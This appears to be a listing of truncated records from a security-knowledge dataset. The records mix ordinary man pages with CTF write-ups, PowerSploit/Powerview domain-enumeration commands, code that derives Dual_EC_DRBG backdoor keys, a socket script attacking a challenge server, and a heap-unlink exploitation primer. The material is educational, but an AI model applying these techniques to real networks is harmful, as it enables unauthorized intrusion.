# Thinking-Plan --- ## 系统思维 - SYSTEMS THINKING ### 冰山模型 - Iceberg Model <img src="../../assets/img/Plan/Thinking-Plan/19.png" width="15%" align="right"> > 通过观察抽象的隐藏层次,发现事件的根本原因。 冰山模型是一个工具,它可以让你改变你的视角,超越每个人都注意到的直接事件。它帮助你发现这些事件发生的根本原因。这可以通过观察系统内更深层次的抽象来实现,而这些抽象并不是一目了然的。 <br><br> <img src="../../assets/img/Plan/Thinking-P...
sec-knowleage
# Powerview Powerview 是PowerSploit工具集中用于域枚举的一个特别好的工具。几乎所有的功能在Empire中也都有。尽管每个功能都是可以直接看懂的并且你需要自己去探索。我仍然会在这提供一些提示。我强烈建议阅读这类基于Powershell的黑客工具的源码,因为有大量的提示和样例和他们绑在一起。 Harmj0y 在这个 Github 上也有一些技巧和窍门。 <https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993> --- ## User functions `Invoke-EnumerateLocalAdmin` 枚举域中所有计算机...
sec-knowleage
# nobus-101 After reverse-engineering the binary, we learned that it uses the Dual_EC_DRBG backdoored keys. The curve generatoin itself is deterministic, but we needed to reverse it. It looks like this: ```python MAGIC = 0x132867e88e82431dc40ba24e11bf3ec7ffb18764a3b4df1f5957fd5f37d8be40 def gen_backdoor(): P = P256...
sec-knowleage
.\"Generated by db2man.xsl. Don't modify this, modify the source. .de Sh \" Subsection .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \" List item .br .ie \\n(.$>=3 .ne \\$3 .el .ne 3 .IP "\\$1" \\$2 .. .TH "NMBLOOKUP" 1 "" "" "" .SH NAME nmb...
sec-knowleage
# Bashmach Alpha Passover Challenges - חידת בסמ"ח אלפא לפסח ## Riddle Basmach Alpha released a nice set of challenges for Passover on their [Instagram channel](https://www.instagram.com/bsmch.alpha/). In order to find the challenges, one must first solve the following [riddle](https://www.instagram.com/p/Cq0Q3LstINQ/):...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ## OSX Security 1. [macOS-Security-and-Privacy-Guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide) 2. [mOSL](https://github.com/0xmachos/mOSL)
sec-knowleage
import socket from time import sleep import re def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("randBox-iw8w3ae3.9447.plumbing", 9447)) ct = getCiphertext(s) breakLevel2(ct, s) for i in range(3): ct = getCiphertext(s) breakLevel3(ct, s) ct = getCip...
sec-knowleage
### Unlink原理 我们在利用 unlink 所造成的漏洞时,其实就是对 chunk 进行内存布局,然后借助 unlink 操作来达成修改指针的效果。 我们先来简单回顾一下 unlink 的目的与过程,其目的是把一个双向链表中的空闲块拿出来(例如 free 时和目前物理相邻的 free chunk 进行合并)。 下面我们首先介绍一下 unlink 最初没有防护时的利用方法,然后介绍目前利用 unlink 的方式。 ### unlink发展历程 在最初 unlink 实现的时候,其实是没有对 chunk 的 size 检查和双向链表检查的,即没有如下检查代码。 ```c // 由于 P 已经在双向链表中,所以有两个地方记录其大小...
sec-knowleage
sftp === 交互式的文件传输程序 ## 补充说明 **sftp命令** 是一款交互式的文件传输程序,命令的运行和使用方式与ftp命令相似,但是,sftp命令对传输的所有信息使用ssh加密,它还支持公钥认证和压缩等功能。 ### 语法 ```shell sftp(选项)(参数) ``` ### 选项 ```shell -B:指定传输文件时缓冲区的大小; -l:使用ssh协议版本1; -b:指定批处理文件; -C:使用压缩; -o:指定ssh选项; -F:指定ssh配置文件; -R:指定一次可以容忍多少请求数; -v:升高日志等级。 ``` ### 参数 目标主机:指定sftp服务器ip地址或者主机名。 ### 实例 建立...
sec-knowleage
# Whack-a-window Web, Miscellaneous ## Whack a window (100 points) > Our CyberTank windows our virtually indestructible. They recover from damage quicker than you can break them. Can you break them all before the time runs out? > > Flag format: CTF{32-hex} A website link was attached. The link leads to a Whack-a-mole...
sec-knowleage
# Weblogic 12.2.1.3 基础镜像 请登录[https://container-registry.oracle.com/pls/apex/f?p=113:4:15548906741410::NO:::](https://container-registry.oracle.com/pls/apex/f?p=113:4:15548906741410::NO:::),并同意条款,方可下载并使用这个镜像。 该镜像为官方提供试用版,请勿使用在正式环境,由此产生的任何纠纷,与本项目(vulhub)无关。
sec-knowleage
#include <stdio.h> #include <string.h> #include <string.h> const char *str0 = "Usage: program --left <num1> --right <num2>\n"; const char *str19_0 = "2"; const char *str1 = "--left"; const char *str58 = "{"; const char *str298 = "_"; const char *str137 = "}"; const char *str2 = "left option is missing!\n"; const char ...
sec-knowleage
.\" You can view this file with: .\" nroff -man [filename] .\" .TH svn 1 .SH NAME svn \- Subversion 命令行客户端工具 .SH "SYNOPSIS 总览" .TP \fBsvn\fP \fIcommand\fP [\fIoptions\fP] [\fIargs\fP] .SH "OVERVIEW 概述" Subversion 是一个版本控制系统,允许保存旧版本的文件和目录 (通常是源代码),保存一个记录何人,何时,为何作出修改等等信息的日志,与 CVS,RCS 或者 SCCS 工具类似。 \fBSubversion\fP 保存着主控源文...
sec-knowleage
# S7comm 相关 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **简介** S7 协议的 TCP/IP 实现依赖于面向块的 ISO 传输服务。S7 协议被封装在 TPKT 和 ISO-COTP 协议中,这使得 PDU(协议数据单元)能够通过 TCP 传送。 它用于 PLC 编程,在 PLC 之间交换数据,从 SCADA(监控和数据采集)系统访问 PLC 数据以及诊断目的。 S7Comm 以太网协议基于 OSI 模型: | layer | Protocol | | - | - | | 7 Application Layer | S7 ...
sec-knowleage
named-checkzone === 使用named-checkzone命令可以进行区域文件有效性检查和转换,必须指定区域名称和区域文件名称 ## 补充说明 **named-checkzone命令** 可以进行区域文件有效性检查和转换,必须指定区域名称和区域文件名称。 ### 语法 ```shell named-checkzone [选项] [区域名] [区域文件名] ``` ### 选项 ```shell -q 安静模式 -d 启用调试 -c <类别> 指定区域的类别。如果没指定就使用IN ``` ### 例子 对区域文件/var/named/192.168.0.rev进行有效性检查和转换。 ```shell [root@l...
sec-knowleage
sar === 系统运行状态统计工具 ## 补充说明 **sar命令** 是Linux下系统运行状态统计工具,它将指定的操作系统状态计数器显示到标准输出设备。sar工具将对系统当前的状态进行取样,然后通过计算数据和比例来表达系统的当前运行状态。它的特点是可以连续对系统取样,获得大量的取样数据。取样数据和分析的结果都可以存入文件,使用它时消耗的系统资源很小。 ### 语法 ```shell sar(选项)(参数) ``` ### 选项 ```shell -A: 显示所有的报告信息; -b: 显示I/O速率; -B: 显示换页状态; -c: 显示进程创建活动; -d: 显示每个块设备的状态; -e: 设置显示报告的结束时间; -f:...
sec-knowleage
# Writeup Backdoor CTF 2016 Team: rev, msm, akrasuski, nazywam, ppr, shalom, c7f.m0d3 ### Table of contents * [Offensive 300](offensive_300) * [Offensive 400](offensive_400)
sec-knowleage
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not us...
sec-knowleage
# T1608-004-阶段性能力-Drive-by Target ## 来自ATT&CK的描述 攻击者可能会准备一个操作环境来感染在正常浏览过程中访问网站的系统。端点系统可能通过浏览攻击者控制的网站而被入侵,就像Drive-by Compromise中的情况。在这种情况下,用户的网络浏览器通常是利用的目标(一旦登陆网站,通常不需要任何额外的用户互动),但攻击者也可能为非利用行为(如应用访问标记)设置网站。在进行“偷渡式”破坏之前,攻击者必须准备好必要的资源,以便向浏览到攻击者控制的网站的用户提供这种利用。偷渡内容可以在攻击者控制的基础设施上上演,这些基础设施已经获得(购买基础设施)或以前被破坏(盗取基础设施)。 攻击者可能会上传或...
sec-knowleage
'\" t .\" Copyright (c)1996 Andries Brouwer <aeb@cwi.nl>, Mon Oct 31 22:13:04 1996 .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your option)...
sec-knowleage
# SFX 法 "SFX"法利用了Ollydbg自带的OEP寻找功能, 可以选择直接让程序停在OD找到的OEP处, 此时壳的解压过程已经完毕, 可以直接dump程序. ## 要点 1. 设置OD, 忽略所有异常, 也就是说异常选项卡里面都打上勾 2. 切换到SFX选项卡, 选择"字节模式跟踪实际入口(速度非常慢)", 确定 3. 重载程序(如果跳出是否"压缩代码?"选择"否", OD直接到达OEP) ## 示例 示例程序可以点击此处下载: [6_sfx.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/6_sfx.zi...
sec-knowleage
<?php namespace app\index\model; use think\Model; class User extends Model { protected $table = 'user'; }
sec-knowleage
### Code Section概述 在动态链接器创建了进程镜像,并且执行了重定位后,每一个共享目标文件都有机会去执行一些初始化的代码。所有的共享目标文件会在可执行文件获得权限之前进行初始化。 在调用目标文件 A 的初始化代码之前,会首先调用所有 A 依赖的共享目标文件的初始化代码。比如说,如果目标文件 A 依赖于另外一个目标文件 B,那么 B 就会在 A 的依赖列表中,这会被记录在动态结构的 DT_NEEDED 中。循环依赖的初始化是未被定义的。 目标文件的初始化通过递归每一个被依赖的表项来完成。只有当一个目标文件依赖的所有的目标文件都处理完自己的依赖后,这个目标文件才会执行初始化代码。 下面的例子解释了两种正确的可以用来生成给定...
sec-knowleage
# Make a point Category: Misc., 100 points ## Description > Due to a worldwide virus all of our users now need to work from home. So we created a brand-new remote system for them to keep their flags online. But lately we started to suspect that someone succeeded to get the Admin's flag. Can you point us to the right di...
sec-knowleage